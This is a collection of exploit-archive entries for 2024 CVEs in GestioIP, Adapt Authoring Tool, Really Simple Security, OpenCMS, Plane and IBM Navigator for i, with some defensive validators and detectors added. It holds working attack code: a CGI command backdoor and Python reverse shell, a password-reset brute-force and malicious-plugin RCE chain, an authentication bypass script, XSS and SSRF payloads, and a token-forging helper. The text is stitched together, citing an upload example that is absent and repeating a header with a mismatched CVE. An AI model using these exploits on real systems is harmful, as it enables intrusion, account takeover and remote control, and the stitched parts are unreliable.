# CVE: CVE-2024-48760

import requests
import sys

# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w

use strict;

print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";

my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g; 
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;

print "<html><body>";
print '<!-- CGI backdoor -->';

if (!$req) {
    print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
    print "Executing: $req";
}

print "<pre>";
my @cmd = `$req`;
print "</pre>";

foreach my $line (@cmd) {
    print $line . "<br/>";
}

print "</body></html>";
"""

# Exploit functions
def upload_file(session, file_name, file_data):
    """Uploads the file to the server"""
    files = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data)
    }
    response = session.post(target_url, files=files)
    if "OK" not in response.text:
        print(f"[!] Error uploading {file_name}.")
        sys.exit(1)
    return response

def run_command(session, cmd):
    """Execute a command in the server through the vuln"""
    url = target_url + '?' + cmd
    resp = session.get(url)
    print(resp.text)

def backdoor_exists(session):
    """Verifies if backdoor is already uploaded or not"""
    response = session.get(target_url + "?whoami")
    if "www-data" in response.text:
        return True  # backdoor already uploaded
    return False  # backdoor not uploaded yet

if __name__ == '__main__':
    with requests.Session() as session:
        session.auth = (username, password)

        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")

        # Execute the reverse shell
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)
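Both the profile-picture upload above (CVE-2024-52302) and the GestioIP `upload.cgi` case (CVE-2024-48760) come down to the same defect: the server trusts the client's file name and content and stores the file where it can later be executed. The validator below is an added defensive example, part of neither project. It decides by file content, discards the client's name and extension, and stores under a constructed `upload_root` that is meant to be served as static bytes only.

```python
import os
import re
import secrets

# Allowed profile-picture types: magic bytes -> (mime, canonical extension).
# Constructed allowlist for the demo; the decision never uses the client's
# filename or Content-Type.
IMAGE_MAGIC = (
    (b"\x89PNG\r\n\x1a\n", "image/png", ".png"),
    (b"\xff\xd8\xff", "image/jpeg", ".jpg"),
    (b"GIF87a", "image/gif", ".gif"),
    (b"GIF89a", "image/gif", ".gif"),
)
# Patterns that have no business inside a picture; their presence marks a
# polyglot crafted to be executed server-side (.php/.jsp/.html payloads).
# Only longer patterns are used: two- or three-byte ones would false-positive
# on ordinary compressed image data.
SCRIPT_MARKERS = (b"<?php", b"<script", b"<%@ page", b"<jsp:")

MAX_UPLOAD_BYTES = 2 * 1024 * 1024


def sniff_image(data):
    """Return (mime, extension) for recognised image content, else None."""
    for magic, mime, ext in IMAGE_MAGIC:
        if data.startswith(magic):
            return mime, ext
    return None


def validate_profile_picture(client_filename, data):
    """Return (stored_name, mime, audit_name) or raise ValueError.

    stored_name is random with the sniffed extension, so the client chooses
    neither name nor extension; audit_name is a sanitised copy of the client's
    name, kept only for logging."""
    if not data or len(data) > MAX_UPLOAD_BYTES:
        raise ValueError("empty or oversized upload")
    sniffed = sniff_image(data)
    if sniffed is None:
        raise ValueError("content is not an allowed image type")
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        raise ValueError("image contains server-side script markers")
    mime, ext = sniffed
    base = os.path.basename(client_filename.replace("\\", "/"))
    audit_name = re.sub(r"[^A-Za-z0-9._-]", "_", base)[:64] or "unnamed"
    stored_name = secrets.token_hex(16) + ext
    return stored_name, mime, audit_name


def upload_decision(client_filename, data):
    """Wrapper returning ('accepted', stored_name) or ('rejected', reason)."""
    try:
        stored_name, _mime, _audit = validate_profile_picture(client_filename, data)
        return ("accepted", stored_name)
    except ValueError as exc:
        return ("rejected", str(exc))


def storage_path(upload_root, stored_name):
    """Uploads live under a directory the web server serves as static bytes
    only, with no CGI/PHP/JSP handler mapped to it (upload_root is constructed)."""
    return os.path.join(upload_root, stored_name)
```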
            
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50857

### Description

The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.

### Prerequisites

To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:

• Show backuped device configurations (read_device_config_perm)
• Upload device configurations (write_device_config_perm)
• Administrate CM (administrative_cm_perm)



1) vulnerable parameter: `host_id`

http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'


2) vulnerable parameter: `stored_config`

http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'
            
# Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting (XSS)
# Date: 24-11-2024
# Exploit Author: Siddhartha Naik
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1
# Affected Version: 17.0
# Category: WebApps
# Tested on: Windows 11
# CVE : CVE-2024-41447

1. Vendor Description:

OpenCms from Alkacon Software is a professional, easy to use website
content management system. OpenCms helps content managers worldwide to
create and maintain beautiful websites fast and efficiently.

2. Technical Description:

This is a Stored XSS vulnerability in the author field seen when publishing an article. This vulnerability has been tested on the latest versions of the Brave and Firefox browsers. It is believed to affect any user who clicks on the "Read More" button of the affected article and can be exploited by any user who is able to modify/create articles.

3. Proof Of Concept:

a)  Start by creating a new article. In the author field write your script like so:

<script>alert(1)</script>

b)  Save and publish the article
c)  The user who clicks on the read more button gets a popup saying '1' 

4. Solution:

Upgrade to latest release.
http://www.opencms.org/en/home/news.html

5. Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41447
https://github.com/Sidd545-cr/CVE/blob/main/CVE-2024-41447%20-%20Stored%20XSS%20in%20author%20field.pdf
http://alkacon.com
http://opencms.com
            
# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
# Date: 2024-11-24
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.adaptlearning.org/
# Software Link: https://github.com/adaptlearning/adapt_authoring
# Version: 0.11.3
# CVE Identifier: CVE-2024-50672 , CVE-2024-50671

import io
import sys
import json
import zipfile
import argparse
import requests
import textwrap


def get_session_cookie(username, password):
    data = {"email": username, "password": password}
    res = requests.post(f"{args.url}/api/login", data=data)

    if res.status_code == 200:
        print(f"[+] Login as {username}")
        return res.cookies.get_dict()

    return None


def get_users():
    session_cookie = get_session_cookie(args.username, args.password)
    if session_cookie is None:
        print("[-] Login failed")
        sys.exit()

    res = requests.get(f"{args.url}/api/user", cookies=session_cookie)
    users = [
        {"email": user["email"], "role": user["roles"][0]["name"]}
        for user in json.loads(res.text)
    ]

    roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3}
    users.sort(key=lambda user: roles[user["role"]])
    for user in users:
        print(f"[+] {user['email']} ({user['role']})")

    return users


def reset_password(users):
    # Overwrite potentially expired password reset tokens
    for user in users:
        data = {"email": user["email"]}
        requests.post(f"{args.url}/api/createtoken", data=data)
    print("[+] Generate password reset token for every user")

    valid_characters = "0123456789abcdef"
    next_tokens = ["^"]

    # Ensure that only a single result is returned at a time
    while next_tokens:
        prev_tokens = next_tokens
        next_tokens = []

        for token in prev_tokens:
            for ch in valid_characters:
                data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"}
                res = requests.put(
                    f"{args.url}/api/userpasswordreset/w00tw00t",
                    json=data,
                )

                # Multiple results returned
                if res.status_code == 500:
                    next_tokens.append(token + ch)

    print("[+] Reset every password to HaXX0r3d!")


def create_plugin(plugin_name):
    manifest = {
        "name": plugin_name,
        "version": "1.0.0",
        "extension": "exploit",
        "main": "/js/main.js",
        "displayName": "exploit",
        "keywords": ["adapt-plugin", "adapt-extension"],
        "scripts": {"adaptpostcopy": "/scripts/postcopy.js"},
    }

    property = {
        "properties": {
            "pluginLocations": {
                "type": "object",
                "properties": {"course": {"type": "object"}},
            }
        }
    }

    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    module.exports = async function (fs, path, log, options, done) {{
      try {{
        exec("{args.command}");
      }} catch (err) {{
        log(err);
      }}
      done();
    }};
    """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/bower.json",
            io.BytesIO(json.dumps(manifest).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/properties.schema",
            io.BytesIO(json.dumps(property).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/scripts/postcopy.js",
            io.BytesIO(payload.encode()).getvalue(),
        )

    plugin.seek(0)
    return plugin


def find_plugin(cookies, plugin_type, plugin_name):
    res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies)
    for plugin in json.loads(res.text):
        if plugin["name"] == plugin_name:
            return plugin["_id"]

    return None


def create_course(cookies):
    data = {}
    res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data)
    course_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": course_id}
    res = requests.post(
        f"{args.url}/api/content/contentobject",
        cookies=cookies,
        json=data,
    )
    content_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": content_id}
    res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data)
    article_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": article_id}
    res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data)
    block_id = json.loads(res.text)["_id"]

    component_id = find_plugin(cookies, "component", "adapt-contrib-text")

    data = {
        "_courseId": course_id,
        "_parentId": block_id,
        "_component": "text",
        "_componentType": component_id,
    }
    requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data)

    return course_id


def rce(users):
    session_cookie = None
    for user in users:
        if user["role"] == "Super Admin":
            session_cookie = get_session_cookie(user["email"], "HaXX0r3d!")
            break

    if session_cookie is None:
        print("[-] Failed to log in as a Super Admin account")
        sys.exit()

    plugin_name = "adapt-contrib-xapi"
    print(f"[+] Create malicious plugin : {plugin_name}")
    plugin = create_plugin(plugin_name)

    print("[+] Scan installed plugins")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[+] {plugin_name} not found")
    else:
        print(f"[+] Found {plugin_name}")
        print(f"[+] Remove {plugin_name}")
        requests.delete(
            f"{args.url}/api/extensiontype/{plugin_id}",
            cookies=session_cookie,
        )

    print("[+] Upload plugin")
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(
        f"{args.url}/api/upload/contentplugin",
        cookies=session_cookie,
        files=files,
    )

    print("[+] Find uploaded plugin")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[-] {plugin_name} not found")
        sys.exit()
    print(f"[+] Plugin ID : {plugin_id}")

    print("[+] Add plugin to new courses")
    data = {"_isAddedByDefault": True}
    requests.put(
        f"{args.url}/api/extensiontype/{plugin_id}",
        cookies=session_cookie,
        json=data,
    )

    print("[+] Create a new course")
    course_id = create_course(session_cookie)

    print("[+] Build course")
    res = requests.get(
        f"{args.url}/api/output/adapt/preview/{course_id}",
        cookies=session_cookie,
    )

    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")

    print("[+] Remove course")
    requests.delete(
        f"{args.url}/api/content/course/{course_id}",
        cookies=session_cookie,
    )


def main():
    print("[*] Retrieve user information")
    users = get_users()

    print("\n[*] Reset password")
    reset_password(users)

    print("\n[*] Perform remote code execution")
    rce(users)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL including scheme (e.g. https://www.adaptlearning.org)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-U",
        dest="username",
        help="Username to authenticate as",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-P",
        dest="password",
        help="Password for the specified username",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()
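The upload step above works because the authoring tool runs the script named under the plugin's bower.json "scripts" key (here adaptpostcopy) on the server when a course is built. As an added example, not part of the original exploit or of the Adapt project, the following Python inspector opens a plugin archive before installation, lists every declared hook script and flags ones that reach for child_process. The marker list and the sample archive are constructed for the example; only the bower.json layout and the adaptpostcopy hook name come from the exploit above.

```python
import io
import json
import zipfile

# Substrings in a hook script that indicate OS-level execution. Assumption:
# a short denylist is enough for triage; it is not a substitute for review.
SUSPICIOUS_CALLS = ("child_process", "exec(", "execSync(", "spawn(")


def inspect_plugin_zip(data: bytes) -> dict:
    """Inspect an Adapt plugin archive before it is installed.

    Every entry under the bower.json "scripts" key is treated as a
    server-side lifecycle hook (the exploit uses "adaptpostcopy"). Each
    referenced script is read from the archive and checked for the
    markers above. Returns the plugin name, the declared hooks and a list
    of (hook, script path, reason) findings.
    """
    findings = []
    hooks = {}
    name = None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = set(zf.namelist())
        for manifest_path in sorted(m for m in members if m.endswith("bower.json")):
            manifest = json.loads(zf.read(manifest_path))
            name = manifest.get("name", name)
            root = manifest_path[: -len("bower.json")]
            for hook, script in manifest.get("scripts", {}).items():
                hooks[hook] = script
                script_path = root + script.lstrip("/")
                if script_path not in members:
                    findings.append((hook, script_path, "script missing from archive"))
                    continue
                body = zf.read(script_path).decode("utf-8", errors="replace")
                for marker in SUSPICIOUS_CALLS:
                    if marker in body:
                        findings.append((hook, script_path, marker))
    return {"name": name, "hooks": hooks, "findings": findings}


def build_sample_plugin(plugin_name: str = "adapt-contrib-sample", with_hook: bool = True) -> bytes:
    """Constructed sample archive with the same layout the exploit uploads."""
    manifest = {"name": plugin_name, "version": "1.0.0", "main": "/js/main.js"}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{plugin_name}/js/main.js", "")
        if with_hook:
            manifest["scripts"] = {"adaptpostcopy": "/scripts/postcopy.js"}
            zf.writestr(
                f"{plugin_name}/scripts/postcopy.js",
                'const { exec } = require("child_process");\nexec("id");\n',
            )
        zf.writestr(f"{plugin_name}/bower.json", json.dumps(manifest))
    return buf.getvalue()


if __name__ == "__main__":
    report = inspect_plugin_zip(build_sample_plugin())
    print(f"plugin {report['name']}: hooks={report['hooks']}")
    for hook, path, reason in report["findings"]:
        print(f"[!] {hook} -> {path}: {reason}")
```

A hook that is declared but missing from the archive is reported too, since a manifest can point at a script that only appears after install.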
            
#!/usr/bin/env python3

# Exploit Title: Really Simple Security 9.1.1.1 - Authentication Bypass
# Date: 2024-11-19
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://really-simple-ssl.com/
# Software Link: https://really-simple-ssl.com/
# Version: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1
# Tested on: 'WordPress 6.7.0' in Docker container (vulnerable application), 'Ubuntu 24.04.1 LTS' with 'Python 3.12.3' (script execution)
# CVE: CVE-2024-10924
# Category: WebApps
# Repository: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit
# Vulnerability discovered and reported by: István Márton

# This is a Python3 program that exploits Really Simple Security < 9.1.2 authentication bypass vulnerability.

# This makes it possible for unauthenticated attackers to log in as any existing user on the site, 
# such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).

# https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
# https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl

# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses 
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.

import argparse
import json
import logging
import random
import requests
import string
import validators

from requests.auth import HTTPBasicAuth

VERSION = "v1.0 (2024-11-19)"
DEFAULT_LOGGING_LEVEL = logging.INFO

def parse_arguments():
    parser = argparse.ArgumentParser(
        description=f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}"
    )
    parser.add_argument("-t", "--target",
                        required=True,
                        help="URL of the target WordPress")
    parser.add_argument("-uid", "--user-id",
                        required=False,
                        default=1,
                        help="Victim user ID (1 is usually the admin).")
    parser.add_argument("-v", "--verbose",
                        action="store_true",
                        required=False,
                        default=False,
                        help="verbose mode")
    return parser.parse_args()

def validate_input(args):
    # validators.url() does not raise on a bad URL: it returns True on
    # success and a falsy ValidationError/ValidationFailure object otherwise.
    if not validators.url(args.target):
        raise ValueError("Invalid target URL!")

    try:
        if int(args.user_id) < 1:
            raise ValueError("Invalid user ID!")
    except ValueError:
        raise ValueError("Invalid user ID!")

def send_request(url, user_id):
    logging.info("Sending request to target WordPress.")

    target_endpoint = f"{url}"
    if not target_endpoint.endswith("/"):
        target_endpoint = f"{target_endpoint}/"
    target_endpoint = f"{target_endpoint}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
    }

    body = {
        "user_id": int(user_id),
        "login_nonce": "".join(random.choices(string.digits, k=10)),
        "redirect_to": "/wp-admin/"
    }
    logging.debug(f"Body: {body}")

    try:
        r = requests.post(target_endpoint, headers=headers, json=body, verify=False)
        logging.info(f"Request sent to target WordPress (HTTP {r.status_code}).")
    except Exception as e:
        logging.fatal("Error in contacting the target WordPress.")
        logging.fatal(e)
        return

    # .get() avoids a KeyError when the server sets no cookie at all.
    set_cookie = r.headers.get("Set-Cookie")
    if r.status_code == 200 and set_cookie is not None and "redirect_to" in r.text and "=deleted;" not in set_cookie:
        logging.info(f"Cookie received:\n---------------------\n{set_cookie}\n---------------------")
    else:
        logging.fatal("Wrong response received from the target WordPress.")
        logging.debug(f"Cookie and body received:\n---------------------\n{set_cookie}\n---------------------\n{r.text}\n---------------------")

def main():
    args = parse_arguments()
    logging_level = DEFAULT_LOGGING_LEVEL
    if args.verbose:
        logging_level = logging.DEBUG
    logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")

    validate_input(args)
    target = args.target.strip()
    user_id = int(args.user_id)
    logging.info(f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}")
    logging.debug("Parameters:")
    logging.debug(f"    target = {target}")
    logging.debug(f"   user_id = {user_id}")

    send_request(target, user_id)

    logging.info("Finished.")

if __name__ == "__main__":
    main()
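The script above needs only one unauthenticated POST to the skip_onboarding REST route, which makes the route itself a good detection pivot. As an added example, not part of the original exploit, the following Python code runs a simple detector over constructed access-log lines: it matches the route in both the ?rest_route= and /wp-json/ forms, and rates a 200 with no Referer highest because that is what the script sends and what it treats as success. The log lines, the severity rule and the assumption that a browser-driven onboarding flow carries a Referer are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Route hit by the exploit, reachable as ?rest_route=... or under /wp-json/.
VULN_ROUTE = "/reallysimplessl/v1/two_fa/skip_onboarding"

# Combined-log-format parser; method, path, status and referer are what we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample access-log lines; addresses are documentation ranges,
# not captured traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Nov/2024:10:01:02 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Nov/2024:10:01:05 +0000] "GET /wp-login.php HTTP/1.1" 200 4231 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2024:10:01:06 +0000] "GET /wp-admin/ HTTP/1.1" 200 9023 "-" "Mozilla/5.0"
192.0.2.5 - - [19/Nov/2024:10:02:00 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 403 88 "https://example.org/wp-login.php" "Mozilla/5.0"
"""


def targets_skip_onboarding(path: str) -> bool:
    """True if the request path addresses the vulnerable REST route in either form."""
    parts = urlsplit(path)
    if parts.path.rstrip("/").endswith(VULN_ROUTE):
        return True
    return VULN_ROUTE in parse_qs(parts.query).get("rest_route", [])


def detect(lines) -> list:
    """Return one alert per POST to the skip_onboarding route.

    Severity is "high" for a 200 with no Referer: the exploit script sends no
    Referer and treats a 200 as success. Assumption: a browser-driven
    onboarding flow would carry a Referer from the site itself.
    """
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not targets_skip_onboarding(m["path"]):
            continue
        status = int(m["status"])
        direct = m["referer"] == "-"
        alerts.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "status": status,
            "severity": "high" if status == 200 and direct else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The 403 on the last sample line is still reported at medium severity: a blocked attempt from a new source is worth knowing about even when the plugin is already patched.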
            
# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64

Description:

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.

Steps to Reproduce:

1- Go to the password recovery or login section where the email input is required.

2- Inject the following payload in the email field, replacing the domain with a server you control:

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

Send the request:

POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.
            
# Author Title: John Page (aka hyp3rlinx)
# Author Website: hyp3rlinx.altervista.org
# Source:  https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.

[Vulnerability Type]
HTTP Security Token Bypass

[CVE Reference]
CVE-2024-51464

[Security Issue]
IBM i is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this
vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.

The web application generates an HTTP security token called "Mn:", a 19-digit value, and sets it per user in the HTTP session response header.
Navigator uses this token as an integrity check to protect against arbitrary or malicious HTTP requests: when a request carries a bogus
security token, the server responds with HTTP 403 Forbidden.

However, an attacker can modify an existing token and still get past the 403 Forbidden check. The problem is that the Navigator security token logic
does not properly create the token, nor does it detect whether a token is valid or has been tampered with.

An attacker can manipulate the last eight digits of a token, either by setting them all to zeroes or by incrementing the value by one, as long as the token length stays the same.
This tricks the application into processing an attacker-controlled security token as if it were valid, which undermines the protection entirely.

E.g. Valid HTTP header generated by the server.

Mn: 6844795211344371559
Content-Length: 290
Origin: https://10.1.1.4:2003

Example of a bogus but honoured Mn header value set by an attacker: the last eight digits are padded with zeros and the backend servlet accepts it.
Mn: 6844795211300000000

The MN token is generated in the "initProtectionSetting" java method.

public void initProtectionSetting(HttpServletRequest request, HttpServletResponse response) {
    initEncryption();
    initSession();

   [ REDACTED ]

    setMagicNumber(magicNumber);
    response.setHeader("MN", magicNumber + "");
    setUserAgent(request.getHeader("User-Agent"));
  }


In the doFilter method we see the check for the MN header, which sends HTTP 403 on invalid tokens.

    String mnStr = hRequest.getHeader("MN");
    if (mnStr == null)
      mnStr = hRequest.getParameter("MN");
    if (!isMnMatched(mnStr, hSession)) {
      NavLogger.severe("Forbidden. Incorrect HTTP ID");
      NavLogger.info("Request URI: " + requestURI);
      hResponse.sendError(403);
      return;
    }

An invalid token produces this response:
Error 403: SRVE38895F: Error reported: 403


After the attacker increments the MN value or pads it with zeros, the same request is accepted:
HTTP 200 OK


[References]
ADV0142855
https://www.ibm.com/support/pages/node/7179509

IBM classified the issue as "CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax".
To be clear, HTTP headers are just the delivery method for the attacker-controlled tokens that bypass the Navigator protection.


[Exploit/POC]
Intercept Navigator HTTP requests and either increment the last one or two digits of the Mn: HTTP
header security token or pad its last eight digits with zeroes, keeping the 19-digit length unchanged.
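As an added example, not taken from the advisory or from IBM's code, the following Python helper derives the two token variants described above from an intercepted Mn: value and substitutes one of them into a captured header set. The 19-digit token length, the eight alterable trailing digits and the sample header values come from the advisory; the function names are my own, and the all-nines length check covers the case the advisory's "token length must be the same" rule would otherwise trip on.

```python
MN_LENGTH = 19      # token length observed in the advisory
TAIL_DIGITS = 8     # trailing digits the advisory says can be altered


def forge_mn_tokens(token: str) -> dict:
    """Derive the bypass variants from a captured Mn: value.

    'zero_padded' replaces the last eight digits with zeroes; 'incremented'
    adds one to the numeric value. Both keep the original length, which the
    advisory says is required. Raises ValueError for a malformed token or
    when incrementing would change the length (an all-nines token).
    """
    if not (token.isdigit() and len(token) == MN_LENGTH):
        raise ValueError(f"expected a {MN_LENGTH}-digit numeric token, got {token!r}")
    zero_padded = token[:-TAIL_DIGITS] + "0" * TAIL_DIGITS
    incremented = str(int(token) + 1)
    if len(incremented) != MN_LENGTH:
        raise ValueError("incrementing would change the token length")
    return {"original": token, "zero_padded": zero_padded, "incremented": incremented}


def with_forged_mn(headers: dict, variant: str) -> dict:
    """Return a copy of an intercepted request's headers with Mn: replaced.

    Lookup is case-insensitive because the servlet reads "MN" while the
    browser sends "Mn"; both spellings appear in the advisory.
    """
    key = next((k for k in headers if k.lower() == "mn"), None)
    if key is None:
        raise KeyError("no Mn header in request")
    forged = forge_mn_tokens(headers[key])[variant]
    out = dict(headers)
    out[key] = forged
    return out


if __name__ == "__main__":
    # Constructed example using the header values quoted in the advisory.
    captured = {
        "Mn": "6844795211344371559",
        "Content-Length": "290",
        "Origin": "https://10.1.1.4:2003",
    }
    for variant in ("zero_padded", "incremented"):
        print(variant, with_forged_mn(captured, variant)["Mn"])
```

Applied to the advisory's own sample token, the zero-padded variant is exactly the value the advisory shows being accepted.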


[Network Access]
Remote


[Severity]
Medium
CVSS Base score:  4.3

[Affected versions]
7.5.0,7.4.0, 7.3.0


[Disclosure Timeline]
Vendor Notification:  10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
# Author Title: John Page (aka hyp3rlinx)		
# Author Website: hyp3rlinx.altervista.org
# Source:  https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com



[Vendor]
www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i.
IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application.
This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.


[Vulnerability Type]
Server Side Request Forgery (SSRF)

[CVE Reference]
CVE-2024-51463

[Security Issue]
IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system,
potentially leading to network enumeration or facilitating other attacks.

This is a post-authentication SSRF that reaches non-managed nodes and external hosts on any TCP port. There are two call vectors that can be abused:
the first is "Test TLS connection", but it only allows connections to TCP port 9476.

The second is another servlet method called "testConnectPort", which an authenticated attacker can use to connect to any IP and port
